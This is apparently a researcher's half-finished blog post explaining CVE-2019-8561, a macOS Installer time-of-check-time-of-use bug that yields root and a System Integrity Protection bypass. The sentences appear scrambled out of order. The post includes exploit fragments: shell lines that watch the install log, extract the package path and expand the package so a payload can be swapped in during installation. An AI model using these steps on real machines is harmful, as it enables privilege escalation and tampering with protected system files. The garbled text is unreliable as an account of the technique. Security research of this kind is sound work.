![]() ![]() This post is half finished so I never managed to get a SIP bypass PoC working. Jaron already did the hard work, he found that the Final Cut Pro Video Formats package has .heritable. So in theory all we need to do is find a package with with that entitlement and exploit the same TOCTU bug. SIP BypassĪs mentioned above any binary with the entitlement .heritable affords its child process the ability to bypass SIP. You can view my full, working, r00t Proof of Concept (PoC) script gpg_poc for all the details. We also need to work around read-only disk images. dmg) has, if your target package comes on a disk image. There are some permission issues that need to be accounted for and a separate TOCTOU issue that affects how much space the system thinks the target disk image (. In reality it’s slightly more complicated, but not by much. Modify the package contents to add a payloadĮxpand_path = "/tmp/Install" # Location to expand pkg into # Detect package install starting ( tail -f -n 0 /var/log/install.log & ) | grep -q 'Opened from:' # Extract package location pkg_path = $( grep 'Opened from:' /var/log/install.log | tail -1 | cut -d ' ' -f7- ) # Expand package.Monitor /var/log/install.log for a package being installed.In theory all we have to do to exploit the TOCTOU bug is: This User Interface (UI) will still show that the package is correctly code signed and installer will execute the modified files. pkg and it’s loaded by Installer there is a small window for an attacker to expand the. This is a Time of Check Time of Use (TOCTOU) bug within installer and system_installd ( Package Kit). ![]() Patrick Wardle wrote about how this entitlement could be abused to bypass SIP in his 2016 post Bypassing Apple’s System Integrity Protection. Thus, any package it installs will have the ability to modify SIP protected files. $ jtool -ent /System/Library/PrivateFrameworks/amework/Versions/A/Resources/system_installdĬom.Īny binary with the entitlement .heritable affords child process it spawns the ability to inherit it’s entitlement. We can use Jonathan Levin’s tool jtool (or codesign -d -entitlements) to dump system_installd entitlements: I first heard of this binary in Howard Oakley’s How your Mac can download an old ‘security’ update by accident post. You can see which system binaries have this entitlement by looking it up in Jonathon Levin’s entitlements database.Īny Apple signed package/ software will be installed by system_installd. Modification of SIP protected files requires the entitlement. System Integrity Protection is designed to allow modification of these protected parts only by processes that are signed by Apple and have special entitlements to write to system files, such as Apple software updates and Apple installers. However Apple still needs a way to update the OS so: In short, it prevents modification of certain OS files even by root. It’s a security feature which is designed to protect the OS files on disk and at run time. SIP was introduced in OS X El Capitan ( 10.11). installer -pkg "Install.pkg" -target "/".Tell installer which package to install and where.GPGSuite-dmg.png Install.pkg Uninstall.app/ Execute ls, you should see a file named Installer.pkgĠxmachos on □GLaDOS□ in /Volumes/GPG Suite.hdiutil attach "$HOME/Downloads/GPG_Suite-2019.2.dmg".We can step through how to install GPG Suite via installer in Terminal.app. You can also use it to install packages from the command line. Installer ( /usr/sbin/installer) is the system binary responsible for installing packages. This is what you see after you double click GPG Suite’s Install.pkg file. …contain a product or product component -the package’s payload- to be installed on a computer, and install configuration information that determines where and how the product is installed. Installation packages are directories, that appear as one file (. GPG Suite happens to be the only application bundled as a package installed on my MacBook and Jaron used Pro Video Formats in his OBTS demo. This vulnerability has nothing to do with these packages. ![]() In this post we’ll be using GPG Suite and Apple’s Pro Video Formats 2.1 as our target installer packages. It’s still worth writing about though because it is wonderfully simple and gets us r00t as well as a System Integrity Protection (SIP) bypass. In June 2019 at Objective by the Sea v2.0 (OBTS), Jaron Bradley dropped CVE-2019-8561. ( N.B This is a half finished post that I’m publishing to share the knowledge and get it out of my drafts) ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |